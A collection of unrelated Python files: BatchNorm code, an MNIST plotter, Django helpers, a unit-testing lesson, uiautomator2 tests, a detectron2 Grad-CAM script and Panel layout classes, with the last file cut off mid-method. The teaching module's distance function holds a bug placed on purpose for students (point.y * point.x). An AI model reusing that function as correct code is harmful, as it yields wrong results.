if self.GAMMA not in self._initializers:
self._initializers[self.GAMMA] = create_gamma_initializer()
self._gamma = tf.get_variable(
self.GAMMA,
dtype=dtype,
shape=self._mean_shape,
initializer=self._initializers[self.GAMMA],
partitioner=self._partitioners.get(self.GAMMA, None),
regularizer=self._regularizers.get(self.GAMMA, None),
trainable=self._scale,
)
def _build(self, input_batch, is_training, test_local_stats=True):
"""Connects the BatchNorm module into the graph.
Args:
input_batch: A Tensor of arbitrary dimension. By default, the final
dimension is not reduced over when computing the minibatch statistics.
is_training: A boolean to indicate if the module should be connected in
training mode, meaning the moving averages are updated. Can be a Tensor.
test_local_stats: A boolean to indicate if local batch statistics should
be used when `is_training=False`. If not, moving averages are used.
By default `True`. Can be a Tensor.
Returns:
A tensor with the same shape as `input_batch`.
Raises:
base.IncompatibleShapeError: If `axis` is not valid for the
input shape or has negative entries.
base.NotSupportedError: If `input_batch` has data type of `tf.float16`.
"""
input_shape = input_batch.get_shape()
if self._axis is not None:
if len(self._axis) > len(input_shape):
raise base.IncompatibleShapeError(
"Too many indices specified in axis: len({}) > len({}).".format(self._axis, input_shape)
)
if max(self._axis) >= len(input_shape):
raise base.IncompatibleShapeError(
"One or more index in axis is too large for "
"input shape: {} >= {:d}.".format(self._axis, len(input_shape))
)
if min(self._axis) < 0:
raise base.IncompatibleShapeError("Indices in axis must be non-negative: {} < 0.".format(self._axis))
axis = self._axis
else:
# Reduce over all dimensions except the last.
axis = tuple(range(len(input_shape))[:-1])
dtype = input_batch.dtype.base_dtype
# Maintain moving averages at a minimum precision of tf.float32.
stat_dtype = tf.float32 if dtype == tf.float16 else dtype
self._mean_shape = input_batch.get_shape().as_list()
for index in axis:
self._mean_shape[index] = 1
use_batch_stats = is_training | test_local_stats
mean, variance = self._build_statistics(input_batch, axis, use_batch_stats, stat_dtype)
# Sets up optional gamma and beta parameters
self._build_scale_offset(dtype)
# Sets up the batch normalization op.
out, mean, variance = self._batch_norm_op(input_batch, mean, variance, use_batch_stats, stat_dtype)
# Sets up the update op.
update_ops = self._build_update_ops(mean, variance, is_training)
# Put update ops in the update ops collection if given, otherwise add as
# control dependencies of the output.
if update_ops:
if self._update_ops_collection:
for update_op in update_ops:
tf.add_to_collection(self._update_ops_collection, update_op)
else:
with tf.control_dependencies(update_ops):
out = tf.identity(out)
return out
@property
def initializers(self):
return self._initializers
@property
def partitioners(self):
return self._partitioners
@property
def regularizers(self):
return self._regularizers
@property
def moving_mean(self):
self._ensure_is_connected()
return self._moving_mean
@property
def moving_variance(self):
self._ensure_is_connected()
return self._moving_variance
@property
def beta(self):
self._ensure_is_connected()
if self._beta is None:
raise base.Error("Batch normalization doesn't have an offset, so no beta")
else:
return self._beta
@property
def gamma(self):
self._ensure_is_connected()
if self._gamma is None:
raise base.Error("Batch normalization doesn't have a scale, so no gamma")
else:
return self._gamma
|
the-stack_106_15780
|
import numpy as np
import matplotlib.pyplot as plt
import sys
def format_number(x):
    """Invert the 0-255 grayscale values and reshape a flat 784-element row into a 28x28 image."""
    return 255 - x.reshape((28, 28))
def main(path="means.csv"):
means = np.genfromtxt(path, delimiter=',',dtype=np.uint8)[:,:-1]
print(means.shape)
for i in range(20):
plt.subplot(4,5,i+1)
plt.imshow(format_number(means[i,:]),cmap="Greys")
plt.xticks(())
plt.yticks(())
plt.show()
if __name__ == '__main__':
main(" ".join(sys.argv[1:]))
|
the-stack_106_15782
|
from collections import OrderedDict
from collections.abc import MutableMapping
from copy import deepcopy
from django.db.models import F
def delete_keys_from_dict(dictionary):
"""
Recursive function to remove all keys from a dictionary/OrderedDict which
start with an underscore: "_"
parameters:
- dictionary: dictionary/OrderedDict
return:
OrderedDict
"""
modified_dict = OrderedDict()
for key, value in dictionary.items():
if not key.startswith("_"):
if isinstance(value, MutableMapping):
modified_dict[key] = delete_keys_from_dict(value)
else:
modified_dict[key] = deepcopy(value)
return modified_dict
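# Illustrative example (hypothetical data):
#   delete_keys_from_dict({'a': 1, '_b': 2, 'c': {'_d': 3, 'e': 4}})
#   -> OrderedDict([('a', 1), ('c', OrderedDict([('e', 4)]))])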
def split_mapper_into_qs(mapper):
"""
Django ORM has trouble using .annotate() when the destination field conflicts with an
existing model field, even if it's the same source field (no renaming occuring)
Assuming there is a dictionary with model fieldnames as keys and the target field as the value,
Split that into two objects:
    values_list: a list of fields which you wish to retrieve without renaming
aka when `key` == `value`
annotate_dict: a dictionary/OrderedDict of target and source fields to rename
parameters
- mapper: dictionary/OrderedDict
return:
- values_list: list
    - annotate_dict: OrderedDict
"""
values_list = [k for k, v in mapper.items() if k == v]
annotate_dict = OrderedDict([(v, F(k)) for k, v in mapper.items() if k != v])
return values_list, annotate_dict
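# Illustrative example (hypothetical field names):
#   split_mapper_into_qs({'id': 'id', 'created': 'created_at'})
#   -> (['id'], OrderedDict([('created_at', F('created'))]))
# The two pieces can then feed .values(*values_list) and .annotate(**annotate_dict) separately.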
|
the-stack_106_15783
|
"""
This module helps you understand:
-- UNIT TESTING.
-- the difference between PRINT and RETURN
Authors: David Mutchler, Dave Fisher, Vibha Alangar, Mark Hays, Amanda Stouder,
their colleagues and Owen Land.
"""
###############################################################################
#
# DONE: 1.
# Allow this module to use the rosegraphics.py module by marking the
# src
# folder in this project as a "Sources Root", as follows:
#
# In the Project window (to the left), right click on the src folder,
# then select Mark Directory As ~ Sources Root.
#
###############################################################################
import rosegraphics as rg
import math
def main():
""" Calls the TEST functions in this module. """
run_test_distance()
def run_test_distance():
""" Tests the distance function by using 3 tests. """
# Test 1:
expected = math.sqrt(2)
answer = distance(rg.Point(1, 1))
print('Test 1 expected:', expected)
print(' actual: ', answer)
# Test 2:
expected = 5
answer = distance(rg.Point(3, 4))
print('Test 2 expected:', expected)
print(' actual: ', answer)
# Test 3:
expected = 0
answer = distance(rg.Point(0, 0))
print('Test 3 expected:', expected)
print(' actual: ', answer)
def distance(point):
"""
What comes in: An rg.Point.
What goes out: The distance that the rg.Point is from (0, 0).
Side effects: None.
Example:
If the argument is rg.Point(3, 4) this function returns 5.
"""
# This code has an error, on purpose. Do NOT fix it.
x_squared = point.x * point.x
y_squared = point.y * point.x
return math.sqrt(x_squared + y_squared)
# ----------------------------------------------------------------------
# Calls main to start the ball rolling.
# ----------------------------------------------------------------------
main()
###############################################################################
# DONE: 2.
#
# READ the following, asking questions as needed.
# When you believe that you understand what it says about UNIT TESTING,
# mark the above TO-DO as DONE.
#
# In most exercises we will follow the UNIT TESTING pattern
# that the above code illustrates.
#
# Look at the DISTANCE function defined above.
# It is the function that we want to test. Read its doc-string.
#
# Now look at the run_test_DISTANCE function defined above.
# It is the function that TESTS the DISTANCE function.
# We call this UNIT TESTING because we are testing a single UNIT
# of the program, here, the function DISTANCE.
#
# A run_test_blah function does the following several times:
#
# 1. The HUMAN tester figures out the CORRECT (EXPECTED) answer
# on a particular test case, usually by working the problem
# by hand or by trusting a test case provided by the instructor.
#
# For example, in the above run_test_DISTANCE function,
# the human tester figured out, by doing the problem by hand,
# that the distance that (3, 4) is from (0, 0) is 5:
# expected = 5
#
# 2. The run_test_DISTANCE function CALLS the function to test,
# sending it the test case the human tester chose:
# answer = distance(rg.Point(3, 4))
#
# The code CAPTURES the returned value in a variable (namely, answer).
#
# 3. The run_test_DISTANCE function then PRINTS both the EXPECTED
# answer (5 in our example) and the ACTUAL answer returned
# (the value of the variable answer).
# print('Test 3 expected:', expected)
# print(' actual: ', answer)
#
# The above forms a single TEST for a function that returns a value.
# When the software developer / tester runs the run_test_DISTANCE function,
# she compares the EXPECTED and ACTUAL values that are printed.
# -- If they are the same, the code PASSED the test.
# -- If they are different, the code FAILED the test.
#
# If the code failed the test, the software developer then uses tools
# like a debugger to find the source of the error and fix it.
# The error might be in the code (as in the above example)
# or in the test (if the human tester came up with a wrong answer).
#
# RUN this program now. Did the DISTANCE function pass its tests?
# (Answer: it passed TWO of its tests but NOT all three.)
#
# Testing is a BIG topic, but UNIT TESTING like the code above is a start.
#
# One more thing:
# Students sometimes confuse PRINT and RETURN because you will almost
# always test your functions using this
# capture-in-variable-then-print-variable
# approach. From that alone, it looks like the function could have
# PRINTED the result instead of RETURNing it.
# But remember -- in REAL programs, functions rarely print anything;
#
# ** Functions RETURN values for OTHER functions to use. **
#
# We are teaching you practices that scale up, so we demand that most
# of the functions that you write from here on RETURN a value instead
# of PRINTing it.
#
###############################################################################
|
the-stack_106_15785
|
# coding: utf-8
#
import uiautomator2 as u2
import pytest
import logging
import time
def test_set_xpath_debug(sess):
with pytest.raises(TypeError):
sess.settings['xpath_debug'] = 1
sess.settings['xpath_debug'] = True
assert sess.settings['xpath_debug'] == True
assert sess.xpath.logger.level == logging.DEBUG
sess.settings['xpath_debug'] = False
assert sess.settings['xpath_debug'] == False
assert sess.xpath.logger.level == logging.INFO
def test_wait_timeout(d):
d.settings['wait_timeout'] = 19.0
assert d.wait_timeout == 19.0
d.settings['wait_timeout'] = 10
assert d.wait_timeout == 10
d.implicitly_wait(15)
assert d.settings['wait_timeout'] == 15
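# Note: the timing assertions below treat settings['operation_delay'] as a
# (seconds_before, seconds_after) pair that only applies to the methods listed in
# settings['operation_delay_methods']; this reading is inferred from the test itself.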
def test_operation_delay(d: u2.Device):
x, y = d(text="App").center()
    # test the delay applied before the operation
start = time.time()
d.settings['operation_delay'] = (1, 0)
d.click(x, y)
time_used = time.time() - start
assert 1 < time_used < 1.5
    # test the delay applied after the operation
start = time.time()
d.settings['operation_delay_methods'] = ['press', 'click']
d.settings['operation_delay'] = (0, 2)
d.press("back")
time_used = time.time() - start
assert 2 < time_used < 2.5
    # test operation_delay_methods
start = time.time()
d.settings['operation_delay_methods'] = ['press']
d.click(x, y)
time_used = time.time() - start
assert 0 < time_used < .5
|
the-stack_106_15789
|
import os
import numpy as np
import torch
import cv2
import argparse
from tqdm import tqdm
from detectron2 import model_zoo
from detectron2.config import CfgNode
import detectron2.data.transforms as T
from detectron2.config import get_cfg
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.modeling import build_model
from grad_cam import GradCAM, GradCamPlusPlus
# This code only works for FasterRCNN_C4 architecture
# Can produce heatmap and heatmap++
# constant hardcoded
LAYER_NAME = "roi_heads.res5.2.conv3"
MODEL_ARCHI = "COCO-Detection/faster_rcnn_R_50_C4_1x.yaml"
def get_args():
parser = argparse.ArgumentParser(description="Detectron2 demo for builtin models")
parser.add_argument(
"--clsname_list",
nargs="*",
type=str,
default=['plane'],
help="List of class name that your model is trained for, background class is not counted",
)
parser.add_argument(
"--device",
type=str,
default='cuda',
)
parser.add_argument(
"--conf",
type=float,
default=0.5,
help="Minimum score for instance predictions to be shown",
)
parser.add_argument(
"--method",
type=str,
choices=['gradcam','gradcam++'],
default='gradcam',
help="Visualization method to use",
)
parser.add_argument(
"--pretrained",
type=str,
help="Path to .pth or .pkl pretrained detectron2 model that you want to visualize",
)
parser.add_argument(
"--img_folder",
type=str,
help="A directory contains all images to be detected",
)
parser.add_argument(
"--output",
help="A directory to save output visualizations."
)
return parser.parse_args()
def get_model(args) -> torch.nn.Module:
# load config from file and command-line arguments
cfg = get_cfg()
cfg.merge_from_file(model_zoo.get_config_file(MODEL_ARCHI))
cfg.MODEL.WEIGHTS = args.pretrained
# Set the number of classes
cfg.MODEL.ROI_HEADS.NUM_CLASSES = len(args.clsname_list)
cfg.MODEL.DEVICE = args.device
# Set score_threshold for builtin models
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.conf
cfg.freeze()
print(cfg)
model = build_model(cfg)
checkpointer = DetectionCheckpointer(model)
checkpointer.load(cfg.MODEL.WEIGHTS)
return model, cfg
def get_img_input_dict(d2_cfg: CfgNode, img_path: str) -> dict:
original_image = cv2.imread(img_path)
height, width = original_image.shape[:2]
transform_gen = T.ResizeShortestEdge(
[d2_cfg.INPUT.MIN_SIZE_TEST, d2_cfg.INPUT.MIN_SIZE_TEST], d2_cfg.INPUT.MAX_SIZE_TEST
)
image = transform_gen.get_transform(original_image).apply_image(original_image)
image = torch.as_tensor(image.astype("float32").transpose(2, 0, 1)).requires_grad_(True)
inputs = {"image": image, "height": height, "width": width}
return inputs
def combine_mask_to_img(image, mask):
    """Overlay the CAM mask on the image as a JET heatmap (30% heatmap weight) and return a uint8 image."""
    image = image.copy()
    heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)
    heatmap = np.float32(heatmap) / 255
    # heatmap = heatmap[..., ::-1]  # bgr to rgb
    image = 0.3 * heatmap + np.float32(image / 255)
    image /= np.max(image)
    image *= 255.
    return np.uint8(image)
def save_heatmaps(
original_img: np.ndarray,
result_list: list,
output_folder: str,
img_name: str,
clsname_list: list):
for i, result_dict in enumerate(result_list):
x1, y1, x2, y2 = result_dict['box']
conf = result_dict['conf']
cls_id = result_dict['class_id']
mask = result_dict['cam']
cls_name = clsname_list[cls_id]
crop_area = original_img[y1:y2, x1:x2]
heatmap = combine_mask_to_img(crop_area, mask)
output_path = os.path.join(output_folder,
'{}_obj_{}_{}_{:.2f}.jpg'.format(img_name, i, cls_name, conf))
# resize to make it larger
scale = 10
        # cv2.resize expects (width, height), so reverse the numpy (H, W) shape and scale both dimensions
        heatmap = cv2.resize(heatmap, (heatmap.shape[1] * scale, heatmap.shape[0] * scale), interpolation=cv2.INTER_CUBIC)
cv2.imwrite(output_path, heatmap)
# inference on a single image
def gradcam_single_img(args, cfg, gradcam_model, img_path: str, output_folder: str):
input_dict = get_img_input_dict(cfg, img_path)
result_list = gradcam_model.get_mask_all_detection(input_dict)
#save image (with all your format)
img_name = os.path.basename(img_path)
output_folder = os.path.join(output_folder, args.method)
os.makedirs(output_folder, exist_ok=True)
original_img = cv2.imread(img_path)
save_heatmaps(original_img, result_list, output_folder, img_name, args.clsname_list)
def gradcam(method: str, model):
if method == 'gradcam':
return GradCAM(model, LAYER_NAME)
elif method == 'gradcam++':
return GradCamPlusPlus(model, LAYER_NAME)
# inference on the folder
# just call on single image multiple time
def main(args):
model, cfg = get_model(args)
gradcam_model = gradcam(args.method, model)
for img_file in tqdm(os.listdir(args.img_folder)):
img_path = os.path.join(args.img_folder, img_file)
gradcam_single_img(args, cfg, gradcam_model, img_path, args.output)
if __name__ == "__main__":
"""
python detection/batch_heatmap.py --pretrained pretrained_model/your_model.pth \
--img_folder ./your_folder \
--output ./your_output_folder \
"""
arguments = get_args()
main(arguments)
|
the-stack_106_15790
|
"""
Defines Layout classes which may be used to arrange panes and widgets
in flexible ways to build complex dashboards.
"""
from __future__ import absolute_import, division, unicode_literals
from collections import OrderedDict
import param
import numpy as np
from bokeh.models import (Column as BkColumn, Row as BkRow,
Spacer as BkSpacer, GridBox as BkGridBox,
Box as BkBox, Markup as BkMarkup)
from bokeh.models.widgets import Tabs as BkTabs, Panel as BkPanel
from .util import param_name, param_reprs
from .viewable import Reactive
class Panel(Reactive):
"""
Abstract baseclass for a layout of Viewables.
"""
objects = param.Parameter(default=[], doc="""
The list of child objects that make up the layout.""")
_bokeh_model = None
__abstract = True
_rename = {'objects': 'children'}
_linked_props = []
def __repr__(self, depth=0, max_depth=10):
if depth > max_depth:
return '...'
spacer = '\n' + (' ' * (depth+1))
cls = type(self).__name__
params = param_reprs(self, ['objects'])
objs = ['[%d] %s' % (i, obj.__repr__(depth+1)) for i, obj in enumerate(self)]
if not params and not objs:
return super(Panel, self).__repr__(depth+1)
elif not params:
template = '{cls}{spacer}{objs}'
elif not objs:
template = '{cls}({params})'
else:
template = '{cls}({params}){spacer}{objs}'
return template.format(
cls=cls, params=', '.join(params),
objs=('%s' % spacer).join(objs), spacer=spacer)
#----------------------------------------------------------------
# Callback API
#----------------------------------------------------------------
def _update_model(self, events, msg, root, model, doc, comm=None):
if self._rename['objects'] in msg:
old = events['objects'].old
msg[self._rename['objects']] = self._get_objects(model, old, doc, root, comm)
model.update(**msg)
from .io import state
ref = root.ref['id']
if ref in state._views:
state._views[ref][0]._preprocess(root)
#----------------------------------------------------------------
# Model API
#----------------------------------------------------------------
def _init_properties(self):
properties = {k: v for k, v in self.param.get_param_values()
if v is not None}
del properties['objects']
return self._process_param_change(properties)
def _get_objects(self, model, old_objects, doc, root, comm=None):
"""
Returns new child models for the layout while reusing unchanged
models and cleaning up any dropped objects.
"""
from .pane import panel
new_models = []
for i, pane in enumerate(self.objects):
pane = panel(pane)
self.objects[i] = pane
if pane in old_objects:
child, _ = pane._models[root.ref['id']]
else:
child = pane._get_model(doc, root, model, comm)
new_models.append(child)
for obj in old_objects:
if obj not in self.objects:
obj._cleanup(root)
return new_models
def _get_model(self, doc, root=None, parent=None, comm=None):
model = self._bokeh_model()
if root is None:
root = model
objects = self._get_objects(model, [], doc, root, comm)
props = dict(self._init_properties(), objects=objects)
model.update(**self._process_param_change(props))
self._models[root.ref['id']] = (model, parent)
self._link_props(model, self._linked_props, doc, root, comm)
return model
def _cleanup(self, root):
super(Panel, self)._cleanup(root)
for p in self.objects:
p._cleanup(root)
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
def select(self, selector=None):
"""
Iterates over the Viewable and any potential children in the
applying the Selector.
Arguments
---------
selector: type or callable or None
The selector allows selecting a subset of Viewables by
declaring a type or callable function to filter by.
Returns
-------
viewables: list(Viewable)
"""
objects = super(Panel, self).select(selector)
for obj in self:
objects += obj.select(selector)
return objects
class ListPanel(Panel):
"""
An abstract baseclass for Panel objects with list-like children.
"""
margin = param.Parameter(default=0, doc="""
Allows to create additional space around the component. May
be specified as a two-tuple of the form (vertical, horizontal)
or a four-tuple (top, right, bottom, left).""")
objects = param.List(default=[], doc="""
The list of child objects that make up the layout.""")
__abstract = True
def __init__(self, *objects, **params):
from .pane import panel
if objects:
if 'objects' in params:
raise ValueError("A %s's objects should be supplied either "
"as positional arguments or as a keyword, "
"not both." % type(self).__name__)
params['objects'] = [panel(pane) for pane in objects]
super(Panel, self).__init__(**params)
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
def __getitem__(self, index):
return self.objects[index]
def __len__(self):
return len(self.objects)
def __iter__(self):
for obj in self.objects:
yield obj
def __contains__(self, obj):
return obj in self.objects
def __setitem__(self, index, panes):
from .pane import panel
new_objects = list(self)
if not isinstance(index, slice):
start, end = index, index+1
if start > len(self.objects):
raise IndexError('Index %d out of bounds on %s '
'containing %d objects.' %
(end, type(self).__name__, len(self.objects)))
panes = [panes]
else:
start = index.start or 0
end = len(self) if index.stop is None else index.stop
if index.start is None and index.stop is None:
if not isinstance(panes, list):
raise IndexError('Expected a list of objects to '
'replace the objects in the %s, '
'got a %s type.' %
(type(self).__name__, type(panes).__name__))
expected = len(panes)
new_objects = [None]*expected
end = expected
elif end > len(self.objects):
raise IndexError('Index %d out of bounds on %s '
'containing %d objects.' %
(end, type(self).__name__, len(self.objects)))
else:
expected = end-start
if not isinstance(panes, list) or len(panes) != expected:
raise IndexError('Expected a list of %d objects to set '
'on the %s to match the supplied slice.' %
(expected, type(self).__name__))
for i, pane in zip(range(start, end), panes):
new_objects[i] = panel(pane)
self.objects = new_objects
def clone(self, *objects, **params):
"""
Makes a copy of the layout sharing the same parameters.
Arguments
---------
objects: Objects to add to the cloned layout.
params: Keyword arguments override the parameters on the clone.
Returns
-------
Cloned layout object
"""
if not objects:
if 'objects' in params:
objects = params.pop('objects')
else:
objects = self.objects
elif 'objects' in params:
raise ValueError("A %s's objects should be supplied either "
"as arguments or as a keyword, not both."
% type(self).__name__)
p = dict(self.param.get_param_values(), **params)
del p['objects']
        return type(self)(*objects, **p)
def append(self, obj):
"""
Appends an object to the layout.
Arguments
---------
obj (object): Panel component to add to the layout.
"""
from .pane import panel
new_objects = list(self)
new_objects.append(panel(obj))
self.objects = new_objects
def clear(self):
"""
Clears the objects on this layout.
"""
self.objects = []
def extend(self, objects):
"""
Extends the objects on this layout with a list.
Arguments
---------
objects (list): List of panel components to add to the layout.
"""
from .pane import panel
new_objects = list(self)
new_objects.extend(list(map(panel, objects)))
self.objects = new_objects
def insert(self, index, obj):
"""
Inserts an object in the layout at the specified index.
Arguments
---------
index (int): Index at which to insert the object.
object (object): Panel components to insert in the layout.
"""
from .pane import panel
new_objects = list(self)
new_objects.insert(index, panel(obj))
self.objects = new_objects
def pop(self, index):
"""
Pops an item from the layout by index.
Arguments
---------
index (int): The index of the item to pop from the layout.
"""
new_objects = list(self)
if index in new_objects:
index = new_objects.index(index)
obj = new_objects.pop(index)
self.objects = new_objects
return obj
def remove(self, obj):
"""
Removes an object from the layout.
Arguments
---------
obj (object): The object to remove from the layout.
"""
new_objects = list(self)
new_objects.remove(obj)
self.objects = new_objects
def reverse(self):
"""
Reverses the objects in the layout.
"""
new_objects = list(self)
new_objects.reverse()
self.objects = new_objects
class Row(ListPanel):
"""
Horizontal layout of Viewables.
"""
_bokeh_model = BkRow
class Column(ListPanel):
"""
Vertical layout of Viewables.
"""
_bokeh_model = BkColumn
class WidgetBox(Column):
"""
Vertical layout of widgets.
"""
css_classes = param.List(default=['widget-box'], doc="""
CSS classes to apply to the layout.""")
margin = param.Parameter(default=5, doc="""
        Allows creating additional space around the component. May
be specified as a two-tuple of the form (vertical, horizontal)
or a four-tuple (top, right, bottom, left).""")
class Tabs(ListPanel):
"""
Panel of Viewables to be displayed in separate tabs.
"""
active = param.Integer(default=0, doc="""
Number of the currently active tab.""")
closable = param.Boolean(default=False, doc="""
Whether it should be possible to close tabs.""")
objects = param.List(default=[], doc="""
The list of child objects that make up the tabs.""")
tabs_location = param.ObjectSelector(
default='above', objects=['above', 'below', 'left', 'right'], doc="""
The location of the tabs relative to the tab contents.""")
height = param.Integer(default=None, bounds=(0, None))
width = param.Integer(default=None, bounds=(0, None))
_bokeh_model = BkTabs
_rename = {'objects': 'tabs'}
_linked_props = ['active']
def __init__(self, *items, **params):
if 'objects' in params:
if items:
raise ValueError('Tabs objects should be supplied either '
'as positional arguments or as a keyword, '
'not both.')
items = params['objects']
objects, self._names = self._to_objects_and_names(items)
super(Tabs, self).__init__(*objects, **params)
self.param.watch(self._update_names, 'objects')
# ALERT: Ensure that name update happens first, should be
# replaced by watch precedence support in param
self._param_watchers['objects']['value'].reverse()
def _to_object_and_name(self, item):
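        # A (title, object) tuple keeps the explicit title; a bare object falls
        # back to its own ``name`` attribute or, failing that, a name derived
        # from the wrapped pane's param name.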
from .pane import panel
if isinstance(item, tuple):
name, item = item
else:
name = getattr(item, 'name', None)
pane = panel(item, name=name)
name = param_name(pane.name) if name is None else name
return pane, name
def _to_objects_and_names(self, items):
objects, names = [], []
for item in items:
pane, name = self._to_object_and_name(item)
objects.append(pane)
names.append(name)
return objects, names
def _init_properties(self):
return {k: v for k, v in self.param.get_param_values()
if v is not None and k != 'closable'}
#----------------------------------------------------------------
# Callback API
#----------------------------------------------------------------
def _update_names(self, event):
if len(event.new) == len(self._names):
return
names = []
for obj in event.new:
if obj in event.old:
index = event.old.index(obj)
name = self._names[index]
else:
name = obj.name
names.append(name)
self._names = names
#----------------------------------------------------------------
# Model API
#----------------------------------------------------------------
def _update_model(self, events, msg, root, model, doc, comm=None):
if 'closable' in msg:
closable = msg.pop('closable')
for child in model.tabs:
child.closable = closable
super(Tabs, self)._update_model(events, msg, root, model, doc, comm)
def _get_objects(self, model, old_objects, doc, root, comm=None):
"""
Returns new child models for the layout while reusing unchanged
models and cleaning up any dropped objects.
"""
from .pane import panel
new_models = []
if len(self._names) != len(self):
raise ValueError('Tab names do not match objects, ensure '
'that the Tabs.objects are not modified '
'directly. Found %d names, expected %d.' %
(len(self._names), len(self)))
for i, (name, pane) in enumerate(zip(self._names, self)):
pane = panel(pane, name=name)
self.objects[i] = pane
if pane in old_objects:
child, _ = pane._models[root.ref['id']]
else:
child = pane._get_model(doc, root, model, comm)
child = BkPanel(title=name, name=pane.name, child=child,
closable=self.closable)
new_models.append(child)
for obj in old_objects:
if obj not in self.objects:
obj._cleanup(root)
return new_models
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
def __setitem__(self, index, panes):
new_objects = list(self)
if not isinstance(index, slice):
if index > len(self.objects):
raise IndexError('Index %d out of bounds on %s '
'containing %d objects.' %
(index, type(self).__name__, len(self.objects)))
start, end = index, index+1
panes = [panes]
else:
start = index.start or 0
end = len(self.objects) if index.stop is None else index.stop
if index.start is None and index.stop is None:
if not isinstance(panes, list):
raise IndexError('Expected a list of objects to '
'replace the objects in the %s, '
'got a %s type.' %
(type(self).__name__, type(panes).__name__))
expected = len(panes)
new_objects = [None]*expected
self._names = [None]*len(panes)
end = expected
else:
expected = end-start
if end > len(self.objects):
raise IndexError('Index %d out of bounds on %s '
'containing %d objects.' %
(end, type(self).__name__, len(self.objects)))
if not isinstance(panes, list) or len(panes) != expected:
raise IndexError('Expected a list of %d objects to set '
'on the %s to match the supplied slice.' %
(expected, type(self).__name__))
for i, pane in zip(range(start, end), panes):
new_objects[i], self._names[i] = self._to_object_and_name(pane)
self.objects = new_objects
def clone(self, *objects, **params):
"""
Makes a copy of the Tabs sharing the same parameters.
Arguments
---------
objects: Objects to add to the cloned Tabs object.
params: Keyword arguments override the parameters on the clone.
Returns
-------
Cloned Tabs object
"""
if not objects:
if 'objects' in params:
objects = params.pop('objects')
else:
objects = zip(self._names, self.objects)
elif 'objects' in params:
raise ValueError('Tabs objects should be supplied either '
'as positional arguments or as a keyword, '
'not both.')
p = dict(self.param.get_param_values(), **params)
del p['objects']
        return type(self)(*objects, **p)
def append(self, pane):
"""
Appends an object to the tabs.
Arguments
---------
obj (object): Panel component to add as a tab.
"""
new_object, new_name = self._to_object_and_name(pane)
new_objects = list(self)
new_objects.append(new_object)
self._names.append(new_name)
self.objects = new_objects
def clear(self):
"""
Clears the tabs.
"""
self._names = []
self.objects = []
def extend(self, panes):
"""
        Extends the tabs with a list.
Arguments
---------
objects (list): List of panel components to add as tabs.
"""
new_objects, new_names = self._to_objects_and_names(panes)
objects = list(self)
objects.extend(new_objects)
self._names.extend(new_names)
self.objects = objects
def insert(self, index, pane):
"""
Inserts an object in the tabs at the specified index.
Arguments
---------
index (int): Index at which to insert the object.
object (object): Panel components to insert as tabs.
"""
new_object, new_name = self._to_object_and_name(pane)
new_objects = list(self.objects)
new_objects.insert(index, new_object)
self._names.insert(index, new_name)
self.objects = new_objects
def pop(self, index):
"""
Pops an item from the tabs by index.
Arguments
---------
index (int): The index of the item to pop from the tabs.
"""
new_objects = list(self)
if index in new_objects:
index = new_objects.index(index)
new_objects.pop(index)
self._names.pop(index)
self.objects = new_objects
def remove(self, pane):
"""
Removes an object from the tabs.
Arguments
---------
obj (object): The object to remove from the tabs.
"""
new_objects = list(self)
if pane in new_objects:
index = new_objects.index(pane)
new_objects.remove(pane)
self._names.pop(index)
self.objects = new_objects
def reverse(self):
"""
Reverses the tabs.
"""
new_objects = list(self)
new_objects.reverse()
self._names.reverse()
self.objects = new_objects
class GridSpec(Panel):
objects = param.Dict(default={}, doc="""
The dictionary of child objects that make up the grid.""")
mode = param.ObjectSelector(
default='warn', objects=['warn', 'error', 'override'], doc="""
Whether to warn, error or simply override on overlapping
assignment.""")
width = param.Integer(default=600)
height = param.Integer(default=600)
_bokeh_model = BkGridBox
_rename = {'objects': 'children', 'mode': None}
def __init__(self, **params):
if 'objects' not in params:
params['objects'] = OrderedDict()
super(GridSpec, self).__init__(**params)
def _init_properties(self):
properties = super(GridSpec, self)._init_properties()
if self.sizing_mode not in ['fixed', None]:
if 'min_width' not in properties and 'width' in properties:
properties['min_width'] = properties['width']
if 'min_height' not in properties and 'height' in properties:
properties['min_height'] = properties['height']
return properties
def _get_objects(self, model, old_objects, doc, root, comm=None):
if self.ncols:
width = int(float(self.width)/self.ncols)
else:
width = 0
if self.nrows:
height = int(float(self.height)/self.nrows)
else:
height = 0
children = []
for (y0, x0, y1, x1), obj in self.objects.items():
x0 = 0 if x0 is None else x0
x1 = (self.ncols) if x1 is None else x1
y0 = 0 if y0 is None else y0
y1 = (self.nrows) if y1 is None else y1
r, c, h, w = (y0, x0, y1-y0, x1-x0)
if self.sizing_mode in ['fixed', None]:
properties = {'width': w*width, 'height': h*height}
else:
properties = {'sizing_mode': self.sizing_mode}
obj.set_param(**properties)
model = obj._get_model(doc, root, model, comm)
if isinstance(model, BkMarkup) and self.sizing_mode not in ['fixed', None]:
if model.style is None:
model.style = {}
style = {}
if 'width' not in model.style:
style['width'] = '100%'
if 'height' not in model.style:
style['height'] = '100%'
if style:
model.style.update(style)
if isinstance(model, BkBox) and len(model.children) == 1:
model.children[0].update(**properties)
else:
model.update(**properties)
children.append((model, r, c, h, w))
new_objects = list(self.objects.values())
if isinstance(old_objects, dict):
old_objects = list(old_objects.values())
for old in old_objects:
if old not in new_objects:
old._cleanup(root)
return children
@property
def _xoffset(self):
min_xidx = [x0 for (_, x0, _, _) in self.objects if x0 is not None]
return min(min_xidx) if min_xidx and len(min_xidx) == len(self.objects) else 0
@property
def _yoffset(self):
min_yidx = [y0 for (y0, x0, _, _) in self.objects if y0 is not None]
return min(min_yidx) if min_yidx and len(min_yidx) == len(self.objects) else 0
@property
def _object_grid(self):
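        # Build an (nrows, ncols) object array where every cell covered by an
        # assignment holds a one-element set containing its
        # ((y0, x0, y1, x1), obj) pair, so regions can be looked up per cell.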
grid = np.full((self.nrows, self.ncols), None)
for i, ((y0, x0, y1, x1), obj) in enumerate(self.objects.items()):
l = 0 if x0 is None else x0
r = self.ncols if x1 is None else x1
t = 0 if y0 is None else y0
b = self.nrows if y1 is None else y1
for y in range(t, b):
for x in range(l, r):
grid[y, x] = {((y0, x0, y1, x1), obj)}
return grid
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
@property
def nrows(self):
max_yidx = [y1 for (_, _, y1, _) in self.objects if y1 is not None]
return max(max_yidx) if max_yidx else 0
@property
def ncols(self):
